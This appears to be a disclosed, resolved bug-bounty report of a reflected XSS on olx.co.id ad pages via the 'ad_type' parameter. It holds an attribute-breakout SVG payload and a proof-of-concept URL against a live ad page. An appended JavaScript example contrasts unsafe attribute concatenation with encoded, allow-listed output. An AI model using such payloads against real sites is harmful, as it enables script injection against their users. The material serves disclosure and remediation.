Reflected XSS on https://www.olx.co.id/iklan/*.html via "ad_type" parameter

Disclosed: 2019-09-21 12:08:40 By littlestar To olx
Unknown
Vulnerability Details
I found Reflected XSS on https://www.olx.co.id/

- Vulnerability URL : https://www.olx.co.id/iklan/*.html
- Payloads: `"><svg onload=(alert)(1)>`

Proof of Concept:

1. Try to find every URL like this URL structure https://www.olx.co.id/iklan/*.html
2. And add the payloads in `ad_type` parameter, example: https://www.olx.co.id/iklan/baju-pesta-pemakaian-1x-IDzVCT1.html?ad_type=%22%3E%3Csvg%20onload=(alert)(1)%3E
3. XSS will fire up.

## Impact

XSS Attack.
Report Stats
  • Report ID: 630265
  • State: Closed
  • Substate: resolved
  • Upvotes: 35
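
An added illustration, not part of the original report and not OLX's code: the reported payload opens with `">`, which is what closes a double-quoted HTML attribute, so this sketch shows that pattern beside an allow-listed and attribute-encoded version. The reflection context, the `<input>` element, the function names and the allowed `ad_type` values are all assumptions.

```javascript
// Added example; every name here is hypothetical, not taken from the site.

// Payload from the report, URL-decoded the way server-side code would receive it.
const REPORTED = decodeURIComponent('%22%3E%3Csvg%20onload=(alert)(1)%3E');

// Assumed set of legitimate values; the real values are not on the page.
const ALLOWED_AD_TYPES = new Set(['standard', 'featured']);

// Encode every character that can end a quoted attribute or open a tag.
function encodeAttr(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '`': '&#x60;',
  };
  return String(value).replace(/[&<>"'`]/g, (c) => map[c]);
}

// Before: the query value is concatenated into a double-quoted attribute,
// so a leading `">` ends the attribute and the tag.
function renderUnsafe(adType) {
  return '<input type="hidden" name="ad_type" value="' + adType + '">';
}

// Encoding only, for parameters whose values cannot be enumerated.
function renderEncoded(adType) {
  return '<input type="hidden" name="ad_type" value="' + encodeAttr(adType) + '">';
}

// After: reject anything outside the allow-list, then encode anyway so the
// output stays safe if the allow-list is later widened.
function renderSafe(adType) {
  const value = ALLOWED_AD_TYPES.has(adType) ? adType : '';
  return renderEncoded(value);
}

console.log(renderUnsafe(REPORTED));  // attribute is closed, <svg> becomes markup
console.log(renderEncoded(REPORTED)); // payload stays inside the attribute as text
console.log(renderSafe(REPORTED));    // unknown value dropped entirely
```
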